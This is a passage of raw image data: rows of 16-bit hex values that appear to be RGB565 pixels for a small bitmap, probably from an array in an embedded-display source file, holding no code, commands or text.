0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x52cb, 0x10e3, 0x10e4, 0x10e3, 0x0882, 0x39e8, 0x39e8, 0x31c8, 0x31e8, 0x31c7, 0x18e4, 0xc639, 0xffff, 0xffff, 0xf77c, 0x3186, 0x3a2a, 0x324c, 0x22cf, 0x22cf, 0x22d0, 0x22d0, 0x22d0, 0x22d0, 0x22f0, 0x2310, 0x22f0, 0x2310, 0x2b30, 0x2b31, 0x2b51, 0x3372, 0x3372, 0x3352, 0x3b71, 0x3b71, 0x3b91, 0x3b92, 0x3b92, 0x3b91, 0x3371, 0x3371, 0x3351, 0x3350, 0x2b30, 0x3310, 0x3330, 0x2aef, 0x22ae, 0x2acf, 0x22d0, 0x22b0, 0x1ab0, 0x22d0, 0x22af, 0x228e, 0x2aaf, 0x228f, 0x22ae, 0x2aac, 0x21a8, 0x0001, 0x6b6e, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef5d, 0x5acb, 0xbe3a, 0x8492, 0x7c92, 0x84d4, 0x84d5, 0x8cd5, 0xd73d, 0xa557, 0x7c13, 0x8cd5, 0x8d15, 0x7cd3, 0x7452, 0x7453, 0x7433, 0x8494, 0x6c34, 0x532f, 0x4b2e, 0x9577, 0x63f2, 0x3a6d, 0x4b0f, 0x8cd5, 0x532e, 0x3a4a, 0x634e, 0x94d5, 0x630e, 0x3146, 0x18a3, 0x6b0d, 0xb617, 0xd67a, 0xffdf, 0xffdf, 0xffff, 0x94b2, 0x742e, 0x9ed3, 0x34a7, 0x2c85, 0x96d1, 0xc7f7, 0x3467, 0x2ca6, 0x552a, 0xa693, 0x738e, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0x4249, 0x0000, 0x0021, 0x0021, 0x0020, 0x3186, 0x31e7, 0x29a7, 0x31c7, 0x31a7, 0x10e4, 0xc67a, 0xffff, 0xffff, 0xff9d, 0x3185, 0x31e8, 0x29e9, 0x29e9, 0x29e9, 0x29e9, 0x29e9, 0x29c9, 0x29c9, 0x29c9, 0x21c9, 0x21c8, 0x21c8, 0x1988, 0x1987, 0x1987, 0x1147, 0x0926, 0x0906, 0x0905, 0x08e5, 0x08e5, 0x08e4, 0x08e4, 0x00c4, 0x00c4, 0x00c4, 0x00c4, 0x08e4, 0x00c4, 0x00a3, 0x08c4, 0x00a4, 0x00a3, 0x00a4, 0x0084, 0x0085, 0x00a5, 0x00c5, 0x00a4, 0x0083, 0x00a4, 0x00a4, 0x00a3, 0x08c3, 0x08c2, 0x0000, 0x6b6e, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe73c, 0x5acb, 0xef9c, 0xceb9, 0xadf8, 0x534f, 0x63d1, 0x534e, 0x8cf4, 0x638f, 0x73d2, 0x6bb2, 0x5bb0, 0x7513, 0x7514, 0x53d1, 0x4b10, 0x194a, 0x1969, 0x42ad, 0x530f, 0x7c74, 0x5bb1, 0x1968, 0x7cb5, 0xdfbf, 0xc6dc, 0x1125, 0x8472, 0x3a09, 0x6b8f, 0x2986, 0x2124, 0x630b, 0xb5f6, 0xce7a, 0xffbf, 0xffdf, 0xfffe, 0x94f2, 0x7c6f, 0x8e11, 0x4d68, 0x4d68, 0x8e70, 0xc7f8, 0x3c26, 0x8f30, 0x4468, 0xb6d6, 0x6b6d, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0x4229, 0x6bae, 0x8472, 0x8431, 0x7bef, 0x31a6, 0x31c7, 0x31c7, 0x31a7, 0x2986, 0x10e4, 0xbe18, 0xffff, 0xffbd, 0xfffe, 0x8c0f, 0x1904, 0x1987, 0x2145, 0x2145, 0x2145, 0x2145, 0x2125, 0x2125, 0x2105, 0x2104, 0x1904, 0x2124, 0x18e4, 0x10c3, 0x10a3, 0x0882, 0x0883, 0x10a3, 0x10a3, 0x10a3, 0x08a3, 0x08a2, 0x0882, 0x0882, 0x0882, 0x0882, 0x0882, 0x0062, 0x0041, 0x0041, 0x0000, 0x0021, 0x0021, 0x0000, 0x1821, 0x18a3, 0x08a3, 0x08a2, 0x1081, 0x1061, 0x1882, 0x1082, 0x18a2, 0x1081, 0x0020, 0x0041, 0xbdf8, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef5c, 0x6b4c, 0x9d2f, 0x3a25, 0x29c6, 0x7c33, 0xbe5c, 0x3aab, 0x1984, 0x636c, 0xa535, 0x39ea, 0x1986, 0x7d32, 0x8df6, 0x2a6a, 0x1128, 0x8c97, 0x8cb3, 0x2187, 0x31e8, 0xb619, 0x84b3, 0x0905, 0x322a, 0xc6dd, 0x6c11, 0x00a2, 0x42aa, 0xadd7, 0x5b2d, 0x18e4, 0x10a2, 0x632b, 0xb5f6, 0xd69b, 0xffdf, 0xffff, 0xfffe, 0x94f3, 0x7c50, 0xa693, 0x5da9, 0x5548, 0xa6d3, 0xcfd9, 0x5cc9, 0x6589, 0x754b, 0xb635, 0x6b4c, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0x39e7, 0xc659, 0xd6dc, 0xbe18, 0xd69a, 0x2124, 0x2986, 0x2986, 0x2966, 0x2986, 0x10c3, 0xc639, 0xffff, 0xffde, 0xffbd, 0xfffe, 0xc639, 0x8493, 0x8c92, 0x94b2, 0x94b2, 0x94b2, 0x94b2, 0x94b2, 0x9492, 0x9492, 0x9492, 0x9491, 0x94b2, 0x9492, 0x8c72, 0x9cd3, 0x9492, 0x632d, 0x4a8b, 0x4a8b, 0x4a8b, 0x4aab, 0x4aab, 0x4aab, 0x4acb, 0x4acc, 0x4aab, 0x4a8a, 0x5b4d, 0x8c72, 0x8c72, 0x8c72, 0x8c72, 0x8c72, 0xac0f, 0xacb2, 0x9cb2, 0x9cb1, 0xa490, 0xa470, 0xac91, 0xa450, 0xacb2, 0x9c70, 0x8c50, 0xdefb, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe73c, 0x6b6d, 0x848a, 0x10e0, 0x18e3, 0x0002, 0x1927, 0x0020, 0x1121, 0x1901, 0x41c6, 0x1021, 0x10e2, 0x0921, 0x11c3, 0x0081, 0x08a4, 0x20c6, 0x2123, 0x0860, 0x0040, 0x1103, 0x00a1, 0x0081, 0x0061, 0x00a3, 0x0061, 0x00a1, 0x0060, 0x1924, 0x0001, 0x18a4, 0x0000, 0x5aaa, 0xb5f5, 0xce79, 0xffff, 0xfffe, 0xffff, 0x9cd4, 0x8431, 0xdffa, 0x8eae, 0x868f, 0xd7fa, 0xeffc, 0x9e90, 0x96ad, 0xbf13, 0xce77, 0x632c, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0x2985, 0x4249, 0x52eb, 0x4249, 0x4249, 0x2166, 0x2986, 0x2125, 0x2966, 0x2966, 0x10a3, 0xc659, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef7d, 0xd6ba, 0xe73c, 0xe73c, 0xe71c, 0xe71c, 0xe73c, 0xe71c, 0xe71c, 0xe73c, 0xd6ba, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef7d, 0x6b6d, 0x94b2, 0x4207, 0x4a69, 0x52aa, 0x4a48, 0x5aeb, 0x52aa, 0x4a49, 0x3186, 0x5289, 0x4a48, 0x4228, 0x39e7, 0x39c7, 0x5289, 0x4207, 0x39e7, 0x5289, 0x4a69, 0x4228, 0x39e7, 0x528a, 0x4a69, 0x4207, 0x4a49, 0x4228, 0x4a69, 0x4228, 0x4a49, 0x4a69, 0x39c6, 0x6b4d, 0xbdd7, 0xd6ba, 0xffff, 0xffff, 0xffff, 0xad75, 0x18e3, 0x528a, 0x52aa, 0x5aeb, 0x4a48, 0x39e7, 0x5aea, 0x5aca, 0x5aeb, 0x2144, 0x7baf, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0x4249, 0x0861, 0x10c3, 0x1925, 0x08a3, 0x2986, 0x2986, 0x31c7, 0x31a7, 0x2966, 0x10a3, 0xc639, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xdedb, 0xbdf7, 0xc638, 0xc638, 0xce79, 0xd69a, 0xce79, 0xce79, 0xd69a, 0xd69a, 0xc618, 0xe71c, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe73c, 0x738e, 0x8410, 0x0861, 0x18e3, 0x2104, 0x2944, 0x18e3, 0x18c2, 0x18e3, 0x2924, 0x10a2, 0x2924, 0x10a2, 0x10a2, 0x2124, 0x1082, 0x18e3, 0x18e3, 0x18e3, 0x18e3, 0x18e3, 0x18e3, 0x18c3, 0x18c3, 0x18c3, 0x18e3, 0x18e3, 0x18e3, 0x18c2, 0x18e3, 0x2944, 0x0861, 0x52aa, 0xbdf7, 0xce79, 0xffff, 0xffff, 0xffff, 0xbdf7, 0x0000, 0x1081, 0x1081, 0x10a1, 0x1903, 0x2124, 0x0040, 0x10a1, 0x10a1, 0x0000, 0x8410, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0x2986, 0x2965, 0x29a7, 0x29a7, 0x31e8, 0x2145, 0x2966, 0x31c7, 0x2145, 0x2125, 0x0861, 0xc638, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7be, 0xffdf, 0xf7be, 0xffff, 0xffff, 0xf79e, 0xa534, 0x9492, 0xa534, 0xa534, 0xad55, 0xad75, 0xb596, 0xb596, 0xad55, 0xa534, 0xa534, 0x94b2, 0xdefb, 0xffff, 0xffdf, 0xffff, 0xf7be, 0xffff, 0xf79d, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xe71c, 0x630c, 0x9491, 0x2124, 0x31a6, 0x3186, 0x3186, 0x39e7, 0x3186, 0x31a6, 0x39c7, 0x3186, 0x2945, 0x3185, 0x3186, 0x2965, 0x3185, 0x3185, 0x3185, 0x2965, 0x3185, 0x2965, 0x3186, 0x2945, 0x2965, 0x2965, 0x3185, 0x2945, 0x2945, 0x39e7, 0x4207, 0x39c7, 0x2965, 0x8430, 0xad75, 0xdedb, 0xffff, 0xffff, 0xffff, 0xc638, 0x0000, 0x0861, 0x0861, 0x0020, 0x1903, 0x2964, 0x0840, 0x0861, 0x0040, 0x0000, 0x8c31, 0xffff, 0xffff, 0xffbf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x39e7, 0x18e3, 0x1925, 0x2145, 0x1904, 0x2145, 0x2125, 0x0882, 0x1904, 0x31a7, 0x0021, 0xc659, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xd6ba, 0xd69a, 0xc638, 0xce79, 0xd69a, 0xdefb, 0xce79, 0xd69a, 0xdedb, 0xef5d, 0xe71c, 0xe73c, 0xe73c, 0xef5d, 0xef5d, 0xef5d, 0xe73c, 0xdefb, 0xdefb, 0xce79, 0xdefb, 0xdedb, 0xd69a, 0xdedb, 0xd699, 0xdefb, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 